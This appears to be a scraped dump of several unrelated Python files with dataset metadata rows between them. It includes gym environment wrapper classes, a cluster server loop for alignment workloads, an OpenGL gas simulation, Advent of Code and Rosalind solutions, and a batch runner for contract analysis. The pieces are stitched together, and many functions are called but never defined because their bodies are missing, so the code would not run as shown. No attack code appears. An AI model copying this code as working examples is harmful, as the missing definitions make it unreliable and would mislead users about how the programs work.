or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
# This allows to get the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
obs_type: One of {"rgb", "ram", "gryscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
render_mode: One of {None, "human", "rgb_aray"}.
possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
or doest not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
A vectorized environment allows to step several copies of the environment in parallel
when calling ``step_batch``.
It creates a local copy of the environment that is the target of all the other
methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
frameskip: Number of times ``step`` will me called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
env_callable: Callable that returns an instance of the environment \
that will be parallelized.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
If is not provided the signature matches the one from OpenAI gym. It allows \
to apply arbitrary boundary conditions to define custom end states in case \
the env was initialized with a "CustomDeath' object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
if states is None returns `(observs, rewards, ends, infos) `else \
`(new_states, observs, rewards, ends, infos)`.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
Reset the environment and returns the first observation, or the first \
(state, obs) tuple.
Args:
return_state: If true return a also the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
An state completely describes the Environment at a given moment.
Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
dt: [numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
It allows to step a vector of states and actions. The signature and \
behaviour is the same as ``step``, but taking a list of states, actions \
and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635 | 99 | 0.613232 |
5f890b9328d6983928b109fecc583fe7148f59dc | 6,426 | py | Python | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | # Layer 2 server script
# project worker
'''-.
+#_p'-.....
*+...:(loop):..............................................
m}: \
>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@%: 4. remove timed-out from pending and re-open them :
#$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
<: /
%$":......................................................../
%&"$%!.-
$"!.-
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034 | 124 | 0.495331 |
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a | 2,677 | py | Python | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
| 26.245098 | 105 | 0.548001 |
5f9164c1cc7e9494a573895e93fd39680b8520f6 | 1,324 | py | Python | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | null | null | null | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 1 | 2022-01-18T09:28:29.000Z | 2022-01-18T09:28:29.000Z | ymir/backend/src/ymir_app/app/models/iteration.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
| 36.777778 | 79 | 0.749245 |
5f92da5358e075a34f655feb29ca353ec1f92807 | 2,833 | py | Python | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 2 | 2016-08-10T15:08:47.000Z | 2016-10-25T14:27:51.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 41 | 2016-08-04T20:19:49.000Z | 2017-03-07T20:05:53.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 3 | 2016-09-26T19:04:51.000Z | 2017-10-26T22:13:45.000Z | import uuid, hashlib, os, yaml, logging.config, json, requests, re
from bcrypt import hashpw, gensalt
from collections import namedtuple
from sqlalchemy import create_engine
from datetime import datetime
CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE')
ZimbraGrant = namedtuple(
'ZimbraGrant', [
'target_name',
'target_type',
'grantee_name',
'grantee_type',
'right',
'deny'
]
)
logger = CallLogger.logger()
| 26.726415 | 85 | 0.693611 |
5f9463815346a08c07f5a3a2ec02e760f4e9de1f | 3,569 | py | Python | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | 25 | 2021-10-03T06:19:05.000Z | 2022-03-27T12:48:57.000Z | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | import struct
from typing import BinaryIO
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CMarkedType(CFixedType):
"""
Overview:
Type with struct mark, which can be directly read by ``struct`` module.
"""
def __init__(self, mark: str, size: int):
"""
Constructor of :class:`CMarkedType`.
:param mark: Mark of the type.
:param size: Size of the type.
"""
CFixedType.__init__(self, size)
self.__mark = mark
def read(self, file: BinaryIO):
"""
Read from binary with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Result value.
"""
r, = struct.unpack(self.mark, file.read(self.size))
return r
def write(self, file: BinaryIO, val):
"""
Write value to binary IO with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Writing value.
"""
file.write(struct.pack(self.mark, float(val)))
| 24.445205 | 87 | 0.55842 |
5f94b482c019a016c621810412b2112d18748236 | 958 | py | Python | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result) | 23.365854 | 51 | 0.654489 |
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9 | 3,679 | py | Python | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | #MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop(); | 44.325301 | 141 | 0.651264 |
5f972ab5ab25213d75c3f56834078dbd2a9d9668 | 706 | py | Python | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | 3 | 2020-12-09T11:36:31.000Z | 2020-12-11T01:41:52.000Z | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from itertools import chain
from pathlib import Path
from typing import List
INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt"
AnswerGroup = List[str]
if __name__ == "__main__":
with INPUT_FILE.open("r") as f:
input = transform_input(f.read())
print(f"Part 1: {part1(input)}")
print(f"Part 2: {part2(input)}")
| 23.533333 | 75 | 0.660057 |
5f979d09341797e001c31791e45f05729f30d0c6 | 933 | py | Python | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | from symopt.base import SymOptExpr
import sympy as sym
| 27.441176 | 72 | 0.608789 |
5f97f0b8c3e75f1f6f491e876381487088f22f49 | 771 | py | Python | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 4 | 2017-01-25T05:25:52.000Z | 2021-02-18T08:48:51.000Z | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | null | null | null | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 1 | 2018-08-09T20:57:31.000Z | 2018-08-09T20:57:31.000Z | import json
import glob
from tqdm import tqdm
import os
contract_dir = 'contract_data'
cfiles = glob.glob(contract_dir+'/contract*.json')
cjson = {}
print "Loading contracts..."
for cfile in tqdm(cfiles):
cjson.update(json.loads(open(cfile).read()))
results = {}
missed = []
print "Running analysis..."
for c in tqdm(cjson):
with open('tmp.evm','w') as of:
# print "Out: "+cjson[c][1][2:]
of.write(cjson[c][1][2:]+"\0")
os.system('python oyente.py tmp.evm -j -b')
try:
results[c] = json.loads(open('tmp.evm.json').read())
except:
missed.append(c)
print "Writing results..."
with open('results.json', 'w') as of:
of.write(json.dumps(results,indent=1))
with open('missed.json', 'w') as of:
of.write(json.dumps(missed,indent=1))
print "Completed." | 19.769231 | 54 | 0.66537 |
5f981f7b480688c0f261ed48cbccc55b236c176c | 2,266 | py | Python | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2020-07-01T14:40:10.000Z | 2020-07-01T14:40:10.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 9 | 2020-02-07T11:58:51.000Z | 2021-09-07T16:23:38.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2019-11-20T05:53:13.000Z | 2019-11-20T05:53:13.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel
from textory.statistics import variogram, pseudo_cross_variogram
def test_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, _ = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - a[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert variogram(a, lag=1) == res
def test_pseudo_cross_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, b = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - b[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert pseudo_cross_variogram(a, b, lag=1) == res
| 27.634146 | 101 | 0.566637 |
5f9861c2730925ff3619b6059676dc2a261cbae6 | 827 | py | Python | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 9 | 2020-08-12T10:01:00.000Z | 2022-01-05T04:37:48.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 1 | 2021-02-16T10:19:31.000Z | 2021-02-16T10:19:31.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 4 | 2020-08-12T10:13:31.000Z | 2021-11-05T01:26:58.000Z | # -*- coding: utf-8 -*-
# @Author : LG
"""
152 ms, Python3 96.83%
14 MB, Python3 12.45%
""" | 27.566667 | 59 | 0.41717 |
5f98d7e1817b744273f69d626fee4ccb8dd5c371 | 319 | py | Python | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | #Leia o sexo de uma pessoa, s aceite as letras M ou F; Caso contrario, pea a digitao novamente
sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0]
while sexo not in 'MF':
sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0]
print('seu sexo {} e est registrado com sucesso!'.format(sexo)) | 39.875 | 98 | 0.670846 |
5f993e929da96965b346f667b7d028433a1f27c0 | 2,157 | py | Python | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | from nonebot.adapters.onebot.v11.event import MessageEvent
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Bot, Message
from plugins.uma.plugins.uma_whois.data_source import UmaWhois
from plugins.uma import chara
#matcher =on_endswith({'','?',''},priority=5)
matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois")
#matcher =on_startswith('',priority=5)
matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois") | 32.19403 | 94 | 0.623551 |
5f99e058ef025684556e0579c4ec1d81fb084ff1 | 8,288 | py | Python | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 1 | 2020-10-12T18:17:05.000Z | 2020-10-12T18:17:05.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 3 | 2019-11-19T20:41:50.000Z | 2021-06-10T21:48:44.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 2 | 2019-10-30T23:18:57.000Z | 2019-11-23T00:23:17.000Z | from django.http import HttpResponse
from pyspark.sql import SparkSession
from django.shortcuts import render
from datetime import datetime
from core.chartfactory import createBarChart, createPieChart
from core.dataprocessor import DataProcessor
def sample(request):
"""
sample python report
"""
keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp')
values = [10,8,6,4,2,1]
image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 1
#google play app report 2
#google play app report 3 | 35.418803 | 131 | 0.595077 |
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6 | 4,668 | py | Python | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | 4 | 2020-07-24T19:31:51.000Z | 2022-03-12T00:41:28.000Z | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
